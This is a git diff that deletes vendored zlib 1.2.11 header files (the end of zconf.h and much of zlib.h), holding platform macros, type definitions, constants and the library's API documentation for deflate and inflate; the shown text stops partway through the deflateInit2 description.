-            (1 << (windowBits+2)) +  (1 << (memLevel+9))
- that is: 128K for windowBits=15  +  128K for memLevel = 8  (default values)
- plus a few kilobytes for small objects. For example, if you want to reduce
- the default memory requirements from 256K to 128K, compile with
-     make CFLAGS="-O -DMAX_WBITS=14 -DMAX_MEM_LEVEL=7"
- Of course this will generally degrade compression (there's no free lunch).
-
-   The memory requirements for inflate are (in bytes) 1 << windowBits
- that is, 32K for windowBits=15 (default value) plus about 7 kilobytes
- for small objects.
-*/
-
-                        /* Type declarations */
-
-#ifndef OF /* function prototypes */
-#  ifdef STDC
-#    define OF(args)  args
-#  else
-#    define OF(args)  ()
-#  endif
-#endif
-
-#ifndef Z_ARG /* function prototypes for stdarg */
-#  if defined(STDC) || defined(Z_HAVE_STDARG_H)
-#    define Z_ARG(args)  args
-#  else
-#    define Z_ARG(args)  ()
-#  endif
-#endif
-
-/* The following definitions for FAR are needed only for MSDOS mixed
- * model programming (small or medium model with some far allocations).
- * This was tested only with MSC; for other MSDOS compilers you may have
- * to define NO_MEMCPY in zutil.h.  If you don't need the mixed model,
- * just define FAR to be empty.
- */
-#ifdef SYS16BIT
-#  if defined(M_I86SM) || defined(M_I86MM)
-     /* MSC small or medium model */
-#    define SMALL_MEDIUM
-#    ifdef _MSC_VER
-#      define FAR _far
-#    else
-#      define FAR far
-#    endif
-#  endif
-#  if (defined(__SMALL__) || defined(__MEDIUM__))
-     /* Turbo C small or medium model */
-#    define SMALL_MEDIUM
-#    ifdef __BORLANDC__
-#      define FAR _far
-#    else
-#      define FAR far
-#    endif
-#  endif
-#endif
-
-#if defined(WINDOWS) || defined(WIN32)
-   /* If building or using zlib as a DLL, define ZLIB_DLL.
-    * This is not mandatory, but it offers a little performance increase.
-    */
-#  ifdef ZLIB_DLL
-#    if defined(WIN32) && (!defined(__BORLANDC__) || (__BORLANDC__ >= 0x500))
-#      ifdef ZLIB_INTERNAL
-#        define ZEXTERN extern __declspec(dllexport)
-#      else
-#        define ZEXTERN extern __declspec(dllimport)
-#      endif
-#    endif
-#  endif  /* ZLIB_DLL */
-   /* If building or using zlib with the WINAPI/WINAPIV calling convention,
-    * define ZLIB_WINAPI.
-    * Caution: the standard ZLIB1.DLL is NOT compiled using ZLIB_WINAPI.
-    */
-#  ifdef ZLIB_WINAPI
-#    ifdef FAR
-#      undef FAR
-#    endif
-#    include <windows.h>
-     /* No need for _export, use ZLIB.DEF instead. */
-     /* For complete Windows compatibility, use WINAPI, not __stdcall. */
-#    define ZEXPORT WINAPI
-#    ifdef WIN32
-#      define ZEXPORTVA WINAPIV
-#    else
-#      define ZEXPORTVA FAR CDECL
-#    endif
-#  endif
-#endif
-
-#if defined (__BEOS__)
-#  ifdef ZLIB_DLL
-#    ifdef ZLIB_INTERNAL
-#      define ZEXPORT   __declspec(dllexport)
-#      define ZEXPORTVA __declspec(dllexport)
-#    else
-#      define ZEXPORT   __declspec(dllimport)
-#      define ZEXPORTVA __declspec(dllimport)
-#    endif
-#  endif
-#endif
-
-#ifndef ZEXTERN
-#  define ZEXTERN extern
-#endif
-#ifndef ZEXPORT
-#  define ZEXPORT
-#endif
-#ifndef ZEXPORTVA
-#  define ZEXPORTVA
-#endif
-
-#ifndef FAR
-#  define FAR
-#endif
-
-#if !defined(__MACTYPES__)
-typedef unsigned char  Byte;  /* 8 bits */
-#endif
-typedef unsigned int   uInt;  /* 16 bits or more */
-typedef unsigned long  uLong; /* 32 bits or more */
-
-#ifdef SMALL_MEDIUM
-   /* Borland C/C++ and some old MSC versions ignore FAR inside typedef */
-#  define Bytef Byte FAR
-#else
-   typedef Byte  FAR Bytef;
-#endif
-typedef char  FAR charf;
-typedef int   FAR intf;
-typedef uInt  FAR uIntf;
-typedef uLong FAR uLongf;
-
-#ifdef STDC
-   typedef void const *voidpc;
-   typedef void FAR   *voidpf;
-   typedef void       *voidp;
-#else
-   typedef Byte const *voidpc;
-   typedef Byte FAR   *voidpf;
-   typedef Byte       *voidp;
-#endif
-
-#if !defined(Z_U4) && !defined(Z_SOLO) && defined(STDC)
-#  include <limits.h>
-#  if (UINT_MAX == 0xffffffffUL)
-#    define Z_U4 unsigned
-#  elif (ULONG_MAX == 0xffffffffUL)
-#    define Z_U4 unsigned long
-#  elif (USHRT_MAX == 0xffffffffUL)
-#    define Z_U4 unsigned short
-#  endif
-#endif
-
-#ifdef Z_U4
-   typedef Z_U4 z_crc_t;
-#else
-   typedef unsigned long z_crc_t;
-#endif
-
-#ifdef HAVE_UNISTD_H    /* may be set to #if 1 by ./configure */
-#  define Z_HAVE_UNISTD_H
-#endif
-
-#ifdef HAVE_STDARG_H    /* may be set to #if 1 by ./configure */
-#  define Z_HAVE_STDARG_H
-#endif
-
-#ifdef STDC
-#  ifndef Z_SOLO
-#    include <sys/types.h>      /* for off_t */
-#  endif
-#endif
-
-#if defined(STDC) || defined(Z_HAVE_STDARG_H)
-#  ifndef Z_SOLO
-#    include <stdarg.h>         /* for va_list */
-#  endif
-#endif
-
-#ifdef _WIN32
-#  ifndef Z_SOLO
-#    include <stddef.h>         /* for wchar_t */
-#  endif
-#endif
-
-/* a little trick to accommodate both "#define _LARGEFILE64_SOURCE" and
- * "#define _LARGEFILE64_SOURCE 1" as requesting 64-bit operations, (even
- * though the former does not conform to the LFS document), but considering
- * both "#undef _LARGEFILE64_SOURCE" and "#define _LARGEFILE64_SOURCE 0" as
- * equivalently requesting no 64-bit operations
- */
-#if defined(_LARGEFILE64_SOURCE) && -_LARGEFILE64_SOURCE - -1 == 1
-#  undef _LARGEFILE64_SOURCE
-#endif
-
-#if defined(__WATCOMC__) && !defined(Z_HAVE_UNISTD_H)
-#  define Z_HAVE_UNISTD_H
-#endif
-#ifndef Z_SOLO
-#  if defined(Z_HAVE_UNISTD_H) || defined(_LARGEFILE64_SOURCE)
-//#    include <unistd.h>         /* for SEEK_*, off_t, and _LFS64_LARGEFILE */
-#    ifdef VMS
-#      include <unixio.h>       /* for off_t */
-#    endif
-#    ifndef z_off_t
-#      define z_off_t off_t
-#    endif
-#  endif
-#endif
-
-#if defined(_LFS64_LARGEFILE) && _LFS64_LARGEFILE-0
-#  define Z_LFS64
-#endif
-
-#if defined(_LARGEFILE64_SOURCE) && defined(Z_LFS64)
-#  define Z_LARGE64
-#endif
-
-#if defined(_FILE_OFFSET_BITS) && _FILE_OFFSET_BITS-0 == 64 && defined(Z_LFS64)
-#  define Z_WANT64
-#endif
-
-#if !defined(SEEK_SET) && !defined(Z_SOLO)
-#  define SEEK_SET        0       /* Seek from beginning of file.  */
-#  define SEEK_CUR        1       /* Seek from current position.  */
-#  define SEEK_END        2       /* Set file pointer to EOF plus "offset" */
-#endif
-
-#ifndef z_off_t
-#  define z_off_t long
-#endif
-
-#if !defined(_WIN32) && defined(Z_LARGE64)
-#  define z_off64_t off64_t
-#else
-#  if defined(_WIN32) && !defined(__GNUC__) && !defined(Z_SOLO)
-#    define z_off64_t __int64
-#  else
-#    define z_off64_t z_off_t
-#  endif
-#endif
-
-/* MVS linker does not support external names larger than 8 bytes */
-#if defined(__MVS__)
-  #pragma map(deflateInit_,"DEIN")
-  #pragma map(deflateInit2_,"DEIN2")
-  #pragma map(deflateEnd,"DEEND")
-  #pragma map(deflateBound,"DEBND")
-  #pragma map(inflateInit_,"ININ")
-  #pragma map(inflateInit2_,"ININ2")
-  #pragma map(inflateEnd,"INEND")
-  #pragma map(inflateSync,"INSY")
-  #pragma map(inflateSetDictionary,"INSEDI")
-  #pragma map(compressBound,"CMBND")
-  #pragma map(inflate_table,"INTABL")
-  #pragma map(inflate_fast,"INFA")
-  #pragma map(inflate_copyright,"INCOPY")
-#endif
-
-#endif /* ZCONF_H */
diff --git a/thirdparty/zlib/include/zlib.h b/thirdparty/zlib/include/zlib.h
deleted file mode 100644
index f09cdaf..0000000
--- a/thirdparty/zlib/include/zlib.h
+++ /dev/null
@@ -1,1912 +0,0 @@
-/* zlib.h -- interface of the 'zlib' general purpose compression library
-  version 1.2.11, January 15th, 2017
-
-  Copyright (C) 1995-2017 Jean-loup Gailly and Mark Adler
-
-  This software is provided 'as-is', without any express or implied
-  warranty.  In no event will the authors be held liable for any damages
-  arising from the use of this software.
-
-  Permission is granted to anyone to use this software for any purpose,
-  including commercial applications, and to alter it and redistribute it
-  freely, subject to the following restrictions:
-
-  1. The origin of this software must not be misrepresented; you must not
-     claim that you wrote the original software. If you use this software
-     in a product, an acknowledgment in the product documentation would be
-     appreciated but is not required.
-  2. Altered source versions must be plainly marked as such, and must not be
-     misrepresented as being the original software.
-  3. This notice may not be removed or altered from any source distribution.
-
-  Jean-loup Gailly        Mark Adler
-  jloup@gzip.org          madler@alumni.caltech.edu
-
-
-  The data format used by the zlib library is described by RFCs (Request for
-  Comments) 1950 to 1952 in the files http://tools.ietf.org/html/rfc1950
-  (zlib format), rfc1951 (deflate format) and rfc1952 (gzip format).
-*/
-
-#ifndef ZLIB_H
-#define ZLIB_H
-
-#include "zconf.h"
-
-#ifdef __cplusplus
-extern "C" {
-#endif
-
-#define ZLIB_VERSION "1.2.11"
-#define ZLIB_VERNUM 0x12b0
-#define ZLIB_VER_MAJOR 1
-#define ZLIB_VER_MINOR 2
-#define ZLIB_VER_REVISION 11
-#define ZLIB_VER_SUBREVISION 0
-
-/*
-    The 'zlib' compression library provides in-memory compression and
-  decompression functions, including integrity checks of the uncompressed data.
-  This version of the library supports only one compression method (deflation)
-  but other algorithms will be added later and will have the same stream
-  interface.
-
-    Compression can be done in a single step if the buffers are large enough,
-  or can be done by repeated calls of the compression function.  In the latter
-  case, the application must provide more input and/or consume the output
-  (providing more output space) before each call.
-
-    The compressed data format used by default by the in-memory functions is
-  the zlib format, which is a zlib wrapper documented in RFC 1950, wrapped
-  around a deflate stream, which is itself documented in RFC 1951.
-
-    The library also supports reading and writing files in gzip (.gz) format
-  with an interface similar to that of stdio using the functions that start
-  with "gz".  The gzip format is different from the zlib format.  gzip is a
-  gzip wrapper, documented in RFC 1952, wrapped around a deflate stream.
-
-    This library can optionally read and write gzip and raw deflate streams in
-  memory as well.
-
-    The zlib format was designed to be compact and fast for use in memory
-  and on communications channels.  The gzip format was designed for single-
-  file compression on file systems, has a larger header than zlib to maintain
-  directory information, and uses a different, slower check method than zlib.
-
-    The library does not install any signal handler.  The decoder checks
-  the consistency of the compressed data, so the library should never crash
-  even in the case of corrupted input.
-*/
-
-typedef voidpf (*alloc_func) OF((voidpf opaque, uInt items, uInt size));
-typedef void   (*free_func)  OF((voidpf opaque, voidpf address));
-
-struct internal_state;
-
-typedef struct z_stream_s {
-    z_const Bytef *next_in;     /* next input byte */
-    uInt     avail_in;  /* number of bytes available at next_in */
-    uLong    total_in;  /* total number of input bytes read so far */
-
-    Bytef    *next_out; /* next output byte will go here */
-    uInt     avail_out; /* remaining free space at next_out */
-    uLong    total_out; /* total number of bytes output so far */
-
-    z_const char *msg;  /* last error message, NULL if no error */
-    struct internal_state FAR *state; /* not visible by applications */
-
-    alloc_func zalloc;  /* used to allocate the internal state */
-    free_func  zfree;   /* used to free the internal state */
-    voidpf     opaque;  /* private data object passed to zalloc and zfree */
-
-    int     data_type;  /* best guess about the data type: binary or text
-                           for deflate, or the decoding state for inflate */
-    uLong   adler;      /* Adler-32 or CRC-32 value of the uncompressed data */
-    uLong   reserved;   /* reserved for future use */
-} z_stream;
-
-typedef z_stream FAR *z_streamp;
-
-/*
-     gzip header information passed to and from zlib routines.  See RFC 1952
-  for more details on the meanings of these fields.
-*/
-typedef struct gz_header_s {
-    int     text;       /* true if compressed data believed to be text */
-    uLong   time;       /* modification time */
-    int     xflags;     /* extra flags (not used when writing a gzip file) */
-    int     os;         /* operating system */
-    Bytef   *extra;     /* pointer to extra field or Z_NULL if none */
-    uInt    extra_len;  /* extra field length (valid if extra != Z_NULL) */
-    uInt    extra_max;  /* space at extra (only when reading header) */
-    Bytef   *name;      /* pointer to zero-terminated file name or Z_NULL */
-    uInt    name_max;   /* space at name (only when reading header) */
-    Bytef   *comment;   /* pointer to zero-terminated comment or Z_NULL */
-    uInt    comm_max;   /* space at comment (only when reading header) */
-    int     hcrc;       /* true if there was or will be a header crc */
-    int     done;       /* true when done reading gzip header (not used
-                           when writing a gzip file) */
-} gz_header;
-
-typedef gz_header FAR *gz_headerp;
-
-/*
-     The application must update next_in and avail_in when avail_in has dropped
-   to zero.  It must update next_out and avail_out when avail_out has dropped
-   to zero.  The application must initialize zalloc, zfree and opaque before
-   calling the init function.  All other fields are set by the compression
-   library and must not be updated by the application.
-
-     The opaque value provided by the application will be passed as the first
-   parameter for calls of zalloc and zfree.  This can be useful for custom
-   memory management.  The compression library attaches no meaning to the
-   opaque value.
-
-     zalloc must return Z_NULL if there is not enough memory for the object.
-   If zlib is used in a multi-threaded application, zalloc and zfree must be
-   thread safe.  In that case, zlib is thread-safe.  When zalloc and zfree are
-   Z_NULL on entry to the initialization function, they are set to internal
-   routines that use the standard library functions malloc() and free().
-
-     On 16-bit systems, the functions zalloc and zfree must be able to allocate
-   exactly 65536 bytes, but will not be required to allocate more than this if
-   the symbol MAXSEG_64K is defined (see zconf.h).  WARNING: On MSDOS, pointers
-   returned by zalloc for objects of exactly 65536 bytes *must* have their
-   offset normalized to zero.  The default allocation function provided by this
-   library ensures this (see zutil.c).  To reduce memory requirements and avoid
-   any allocation of 64K objects, at the expense of compression ratio, compile
-   the library with -DMAX_WBITS=14 (see zconf.h).
-
-     The fields total_in and total_out can be used for statistics or progress
-   reports.  After compression, total_in holds the total size of the
-   uncompressed data and may be saved for use by the decompressor (particularly
-   if the decompressor wants to decompress everything in a single step).
-*/
-
-                        /* constants */
-
-#define Z_NO_FLUSH      0
-#define Z_PARTIAL_FLUSH 1
-#define Z_SYNC_FLUSH    2
-#define Z_FULL_FLUSH    3
-#define Z_FINISH        4
-#define Z_BLOCK         5
-#define Z_TREES         6
-/* Allowed flush values; see deflate() and inflate() below for details */
-
-#define Z_OK            0
-#define Z_STREAM_END    1
-#define Z_NEED_DICT     2
-#define Z_ERRNO        (-1)
-#define Z_STREAM_ERROR (-2)
-#define Z_DATA_ERROR   (-3)
-#define Z_MEM_ERROR    (-4)
-#define Z_BUF_ERROR    (-5)
-#define Z_VERSION_ERROR (-6)
-/* Return codes for the compression/decompression functions. Negative values
- * are errors, positive values are used for special but normal events.
- */
-
-#define Z_NO_COMPRESSION         0
-#define Z_BEST_SPEED             1
-#define Z_BEST_COMPRESSION       9
-#define Z_DEFAULT_COMPRESSION  (-1)
-/* compression levels */
-
-#define Z_FILTERED            1
-#define Z_HUFFMAN_ONLY        2
-#define Z_RLE                 3
-#define Z_FIXED               4
-#define Z_DEFAULT_STRATEGY    0
-/* compression strategy; see deflateInit2() below for details */
-
-#define Z_BINARY   0
-#define Z_TEXT     1
-#define Z_ASCII    Z_TEXT   /* for compatibility with 1.2.2 and earlier */
-#define Z_UNKNOWN  2
-/* Possible values of the data_type field for deflate() */
-
-#define Z_DEFLATED   8
-/* The deflate compression method (the only one supported in this version) */
-
-#define Z_NULL  0  /* for initializing zalloc, zfree, opaque */
-
-#define zlib_version zlibVersion()
-/* for compatibility with versions < 1.0.2 */
-
-
-                        /* basic functions */
-
-ZEXTERN const char * ZEXPORT zlibVersion OF((void));
-/* The application can compare zlibVersion and ZLIB_VERSION for consistency.
-   If the first character differs, the library code actually used is not
-   compatible with the zlib.h header file used by the application.  This check
-   is automatically made by deflateInit and inflateInit.
- */
-
-/*
-ZEXTERN int ZEXPORT deflateInit OF((z_streamp strm, int level));
-
-     Initializes the internal stream state for compression.  The fields
-   zalloc, zfree and opaque must be initialized before by the caller.  If
-   zalloc and zfree are set to Z_NULL, deflateInit updates them to use default
-   allocation functions.
-
-     The compression level must be Z_DEFAULT_COMPRESSION, or between 0 and 9:
-   1 gives best speed, 9 gives best compression, 0 gives no compression at all
-   (the input data is simply copied a block at a time).  Z_DEFAULT_COMPRESSION
-   requests a default compromise between speed and compression (currently
-   equivalent to level 6).
-
-     deflateInit returns Z_OK if success, Z_MEM_ERROR if there was not enough
-   memory, Z_STREAM_ERROR if level is not a valid compression level, or
-   Z_VERSION_ERROR if the zlib library version (zlib_version) is incompatible
-   with the version assumed by the caller (ZLIB_VERSION).  msg is set to null
-   if there is no error message.  deflateInit does not perform any compression:
-   this will be done by deflate().
-*/
-
-
-ZEXTERN int ZEXPORT deflate OF((z_streamp strm, int flush));
-/*
-    deflate compresses as much data as possible, and stops when the input
-  buffer becomes empty or the output buffer becomes full.  It may introduce
-  some output latency (reading input without producing any output) except when
-  forced to flush.
-
-    The detailed semantics are as follows.  deflate performs one or both of the
-  following actions:
-
-  - Compress more input starting at next_in and update next_in and avail_in
-    accordingly.  If not all input can be processed (because there is not
-    enough room in the output buffer), next_in and avail_in are updated and
-    processing will resume at this point for the next call of deflate().
-
-  - Generate more output starting at next_out and update next_out and avail_out
-    accordingly.  This action is forced if the parameter flush is non zero.
-    Forcing flush frequently degrades the compression ratio, so this parameter
-    should be set only when necessary.  Some output may be provided even if
-    flush is zero.
-
-    Before the call of deflate(), the application should ensure that at least
-  one of the actions is possible, by providing more input and/or consuming more
-  output, and updating avail_in or avail_out accordingly; avail_out should
-  never be zero before the call.  The application can consume the compressed
-  output when it wants, for example when the output buffer is full (avail_out
-  == 0), or after each call of deflate().  If deflate returns Z_OK and with
-  zero avail_out, it must be called again after making room in the output
-  buffer because there might be more output pending. See deflatePending(),
-  which can be used if desired to determine whether or not there is more ouput
-  in that case.
-
-    Normally the parameter flush is set to Z_NO_FLUSH, which allows deflate to
-  decide how much data to accumulate before producing output, in order to
-  maximize compression.
-
-    If the parameter flush is set to Z_SYNC_FLUSH, all pending output is
-  flushed to the output buffer and the output is aligned on a byte boundary, so
-  that the decompressor can get all input data available so far.  (In
-  particular avail_in is zero after the call if enough output space has been
-  provided before the call.) Flushing may degrade compression for some
-  compression algorithms and so it should be used only when necessary.  This
-  completes the current deflate block and follows it with an empty stored block
-  that is three bits plus filler bits to the next byte, followed by four bytes
-  (00 00 ff ff).
-
-    If flush is set to Z_PARTIAL_FLUSH, all pending output is flushed to the
-  output buffer, but the output is not aligned to a byte boundary.  All of the
-  input data so far will be available to the decompressor, as for Z_SYNC_FLUSH.
-  This completes the current deflate block and follows it with an empty fixed
-  codes block that is 10 bits long.  This assures that enough bytes are output
-  in order for the decompressor to finish the block before the empty fixed
-  codes block.
-
-    If flush is set to Z_BLOCK, a deflate block is completed and emitted, as
-  for Z_SYNC_FLUSH, but the output is not aligned on a byte boundary, and up to
-  seven bits of the current block are held to be written as the next byte after
-  the next deflate block is completed.  In this case, the decompressor may not
-  be provided enough bits at this point in order to complete decompression of
-  the data provided so far to the compressor.  It may need to wait for the next
-  block to be emitted.  This is for advanced applications that need to control
-  the emission of deflate blocks.
-
-    If flush is set to Z_FULL_FLUSH, all output is flushed as with
-  Z_SYNC_FLUSH, and the compression state is reset so that decompression can
-  restart from this point if previous compressed data has been damaged or if
-  random access is desired.  Using Z_FULL_FLUSH too often can seriously degrade
-  compression.
-
-    If deflate returns with avail_out == 0, this function must be called again
-  with the same value of the flush parameter and more output space (updated
-  avail_out), until the flush is complete (deflate returns with non-zero
-  avail_out).  In the case of a Z_FULL_FLUSH or Z_SYNC_FLUSH, make sure that
-  avail_out is greater than six to avoid repeated flush markers due to
-  avail_out == 0 on return.
-
-    If the parameter flush is set to Z_FINISH, pending input is processed,
-  pending output is flushed and deflate returns with Z_STREAM_END if there was
-  enough output space.  If deflate returns with Z_OK or Z_BUF_ERROR, this
-  function must be called again with Z_FINISH and more output space (updated
-  avail_out) but no more input data, until it returns with Z_STREAM_END or an
-  error.  After deflate has returned Z_STREAM_END, the only possible operations
-  on the stream are deflateReset or deflateEnd.
-
-    Z_FINISH can be used in the first deflate call after deflateInit if all the
-  compression is to be done in a single step.  In order to complete in one
-  call, avail_out must be at least the value returned by deflateBound (see
-  below).  Then deflate is guaranteed to return Z_STREAM_END.  If not enough
-  output space is provided, deflate will not return Z_STREAM_END, and it must
-  be called again as described above.
-
-    deflate() sets strm->adler to the Adler-32 checksum of all input read
-  so far (that is, total_in bytes).  If a gzip stream is being generated, then
-  strm->adler will be the CRC-32 checksum of the input read so far.  (See
-  deflateInit2 below.)
-
-    deflate() may update strm->data_type if it can make a good guess about
-  the input data type (Z_BINARY or Z_TEXT).  If in doubt, the data is
-  considered binary.  This field is only for information purposes and does not
-  affect the compression algorithm in any manner.
-
-    deflate() returns Z_OK if some progress has been made (more input
-  processed or more output produced), Z_STREAM_END if all input has been
-  consumed and all output has been produced (only when flush is set to
-  Z_FINISH), Z_STREAM_ERROR if the stream state was inconsistent (for example
-  if next_in or next_out was Z_NULL or the state was inadvertently written over
-  by the application), or Z_BUF_ERROR if no progress is possible (for example
-  avail_in or avail_out was zero).  Note that Z_BUF_ERROR is not fatal, and
-  deflate() can be called again with more input and more output space to
-  continue compressing.
-*/
-
-
-ZEXTERN int ZEXPORT deflateEnd OF((z_streamp strm));
-/*
-     All dynamically allocated data structures for this stream are freed.
-   This function discards any unprocessed input and does not flush any pending
-   output.
-
-     deflateEnd returns Z_OK if success, Z_STREAM_ERROR if the
-   stream state was inconsistent, Z_DATA_ERROR if the stream was freed
-   prematurely (some input or output was discarded).  In the error case, msg
-   may be set but then points to a static string (which must not be
-   deallocated).
-*/
-
-
-/*
-ZEXTERN int ZEXPORT inflateInit OF((z_streamp strm));
-
-     Initializes the internal stream state for decompression.  The fields
-   next_in, avail_in, zalloc, zfree and opaque must be initialized before by
-   the caller.  In the current version of inflate, the provided input is not
-   read or consumed.  The allocation of a sliding window will be deferred to
-   the first call of inflate (if the decompression does not complete on the
-   first call).  If zalloc and zfree are set to Z_NULL, inflateInit updates
-   them to use default allocation functions.
-
-     inflateInit returns Z_OK if success, Z_MEM_ERROR if there was not enough
-   memory, Z_VERSION_ERROR if the zlib library version is incompatible with the
-   version assumed by the caller, or Z_STREAM_ERROR if the parameters are
-   invalid, such as a null pointer to the structure.  msg is set to null if
-   there is no error message.  inflateInit does not perform any decompression.
-   Actual decompression will be done by inflate().  So next_in, and avail_in,
-   next_out, and avail_out are unused and unchanged.  The current
-   implementation of inflateInit() does not process any header information --
-   that is deferred until inflate() is called.
-*/
-
-
-ZEXTERN int ZEXPORT inflate OF((z_streamp strm, int flush));
-/*
-    inflate decompresses as much data as possible, and stops when the input
-  buffer becomes empty or the output buffer becomes full.  It may introduce
-  some output latency (reading input without producing any output) except when
-  forced to flush.
-
-  The detailed semantics are as follows.  inflate performs one or both of the
-  following actions:
-
-  - Decompress more input starting at next_in and update next_in and avail_in
-    accordingly.  If not all input can be processed (because there is not
-    enough room in the output buffer), then next_in and avail_in are updated
-    accordingly, and processing will resume at this point for the next call of
-    inflate().
-
-  - Generate more output starting at next_out and update next_out and avail_out
-    accordingly.  inflate() provides as much output as possible, until there is
-    no more input data or no more space in the output buffer (see below about
-    the flush parameter).
-
-    Before the call of inflate(), the application should ensure that at least
-  one of the actions is possible, by providing more input and/or consuming more
-  output, and updating the next_* and avail_* values accordingly.  If the
-  caller of inflate() does not provide both available input and available
-  output space, it is possible that there will be no progress made.  The
-  application can consume the uncompressed output when it wants, for example
-  when the output buffer is full (avail_out == 0), or after each call of
-  inflate().  If inflate returns Z_OK and with zero avail_out, it must be
-  called again after making room in the output buffer because there might be
-  more output pending.
-
-    The flush parameter of inflate() can be Z_NO_FLUSH, Z_SYNC_FLUSH, Z_FINISH,
-  Z_BLOCK, or Z_TREES.  Z_SYNC_FLUSH requests that inflate() flush as much
-  output as possible to the output buffer.  Z_BLOCK requests that inflate()
-  stop if and when it gets to the next deflate block boundary.  When decoding
-  the zlib or gzip format, this will cause inflate() to return immediately
-  after the header and before the first block.  When doing a raw inflate,
-  inflate() will go ahead and process the first block, and will return when it
-  gets to the end of that block, or when it runs out of data.
-
-    The Z_BLOCK option assists in appending to or combining deflate streams.
-  To assist in this, on return inflate() always sets strm->data_type to the
-  number of unused bits in the last byte taken from strm->next_in, plus 64 if
-  inflate() is currently decoding the last block in the deflate stream, plus
-  128 if inflate() returned immediately after decoding an end-of-block code or
-  decoding the complete header up to just before the first byte of the deflate
-  stream.  The end-of-block will not be indicated until all of the uncompressed
-  data from that block has been written to strm->next_out.  The number of
-  unused bits may in general be greater than seven, except when bit 7 of
-  data_type is set, in which case the number of unused bits will be less than
-  eight.  data_type is set as noted here every time inflate() returns for all
-  flush options, and so can be used to determine the amount of currently
-  consumed input in bits.
-
-    The Z_TREES option behaves as Z_BLOCK does, but it also returns when the
-  end of each deflate block header is reached, before any actual data in that
-  block is decoded.  This allows the caller to determine the length of the
-  deflate block header for later use in random access within a deflate block.
-  256 is added to the value of strm->data_type when inflate() returns
-  immediately after reaching the end of the deflate block header.
-
-    inflate() should normally be called until it returns Z_STREAM_END or an
-  error.  However if all decompression is to be performed in a single step (a
-  single call of inflate), the parameter flush should be set to Z_FINISH.  In
-  this case all pending input is processed and all pending output is flushed;
-  avail_out must be large enough to hold all of the uncompressed data for the
-  operation to complete.  (The size of the uncompressed data may have been
-  saved by the compressor for this purpose.)  The use of Z_FINISH is not
-  required to perform an inflation in one step.  However it may be used to
-  inform inflate that a faster approach can be used for the single inflate()
-  call.  Z_FINISH also informs inflate to not maintain a sliding window if the
-  stream completes, which reduces inflate's memory footprint.  If the stream
-  does not complete, either because not all of the stream is provided or not
-  enough output space is provided, then a sliding window will be allocated and
-  inflate() can be called again to continue the operation as if Z_NO_FLUSH had
-  been used.
-
-     In this implementation, inflate() always flushes as much output as
-  possible to the output buffer, and always uses the faster approach on the
-  first call.  So the effects of the flush parameter in this implementation are
-  on the return value of inflate() as noted below, when inflate() returns early
-  when Z_BLOCK or Z_TREES is used, and when inflate() avoids the allocation of
-  memory for a sliding window when Z_FINISH is used.
-
-     If a preset dictionary is needed after this call (see inflateSetDictionary
-  below), inflate sets strm->adler to the Adler-32 checksum of the dictionary
-  chosen by the compressor and returns Z_NEED_DICT; otherwise it sets
-  strm->adler to the Adler-32 checksum of all output produced so far (that is,
-  total_out bytes) and returns Z_OK, Z_STREAM_END or an error code as described
-  below.  At the end of the stream, inflate() checks that its computed Adler-32
-  checksum is equal to that saved by the compressor and returns Z_STREAM_END
-  only if the checksum is correct.
-
-    inflate() can decompress and check either zlib-wrapped or gzip-wrapped
-  deflate data.  The header type is detected automatically, if requested when
-  initializing with inflateInit2().  Any information contained in the gzip
-  header is not retained unless inflateGetHeader() is used.  When processing
-  gzip-wrapped deflate data, strm->adler32 is set to the CRC-32 of the output
-  produced so far.  The CRC-32 is checked against the gzip trailer, as is the
-  uncompressed length, modulo 2^32.
-
-    inflate() returns Z_OK if some progress has been made (more input processed
-  or more output produced), Z_STREAM_END if the end of the compressed data has
-  been reached and all uncompressed output has been produced, Z_NEED_DICT if a
-  preset dictionary is needed at this point, Z_DATA_ERROR if the input data was
-  corrupted (input stream not conforming to the zlib format or incorrect check
-  value, in which case strm->msg points to a string with a more specific
-  error), Z_STREAM_ERROR if the stream structure was inconsistent (for example
-  next_in or next_out was Z_NULL, or the state was inadvertently written over
-  by the application), Z_MEM_ERROR if there was not enough memory, Z_BUF_ERROR
-  if no progress was possible or if there was not enough room in the output
-  buffer when Z_FINISH is used.  Note that Z_BUF_ERROR is not fatal, and
-  inflate() can be called again with more input and more output space to
-  continue decompressing.  If Z_DATA_ERROR is returned, the application may
-  then call inflateSync() to look for a good compression block if a partial
-  recovery of the data is to be attempted.
-*/
-
-
-ZEXTERN int ZEXPORT inflateEnd OF((z_streamp strm));
-/*
-     All dynamically allocated data structures for this stream are freed.
-   This function discards any unprocessed input and does not flush any pending
-   output.
-
-     inflateEnd returns Z_OK if success, or Z_STREAM_ERROR if the stream state
-   was inconsistent.
-*/
-
-
-                        /* Advanced functions */
-
-/*
-    The following functions are needed only in some special applications.
-*/
-
-/*
-ZEXTERN int ZEXPORT deflateInit2 OF((z_streamp strm,
-                                     int  level,
-                                     int  method,
-                                     int  windowBits,
-                                     int  memLevel,
-                                     int  strategy));
-
-     This is another version of deflateInit with more compression options.  The
-   fields next_in, zalloc, zfree and opaque must be initialized before by the
-   caller.
-
-     The method parameter is the compression method.  It must be Z_DEFLATED in
-   this version of the library.
-
-     The windowBits parameter is the base two logarithm of the window size
-   (the size of the history buffer).  It should be in the range 8..15 for this
-   version of the library.  Larger values of this parameter result in better
-   compression at the expense of memory usage.  The default value is 15 if
-   deflateInit is used instead.
-
-     For the current implementation of deflate(), a windowBits value of 8 (a
-   window size of 256 bytes) is not supported.  As a result, a request for 8
-   will result in 9 (a 512-byte window).  In that case, providing 8 to
-   inflateInit2() will result in an error when the zlib header with 9 is
-   checked against the initialization of inflate().  The remedy is to not use 8
-   with deflateInit2() with this initialization, or at least in that case use 9
-   with inflateInit2().
-
-     windowBits can also be -8..-15 for raw deflate.  In this case, -windowBits
-   determines the window size.  deflate() will then generate raw deflate data
-   with no zlib header or trailer, and will not compute a check value.
-
-     windowBits can also be greater than 15 for optional gzip encoding.  Add
-   16 to windowBits to write a simple gzip header and trailer around the
-   compressed data instead of a zlib wrapper.  The gzip header will have no
-   file name, no extra data, no comment, no modification time (set to zero), no
-   header crc, and the operating system will be set to the appropriate value,
-   if the operating system was determined at compile time.  If a gzip stream is
-   being written, strm->adler is a CRC-32 instead of an Adler-32.
-
-     For raw deflate or gzip encoding, a request for a 256-byte window is
-   rejected as invalid, since only the zlib header provides a means of
-   transmitting the window size to the decompressor.
-
-     The memLevel parameter specifies how much memory should be allocated
-   for the internal compression state.  memLevel=1 uses minimum memory but is
-   slow and reduces compression ratio; memLevel=9 uses maximum memory for
-   optimal speed.  The default value is 8.  See zconf.h for total memory usage
-   as a function of windowBits and memLevel.
-
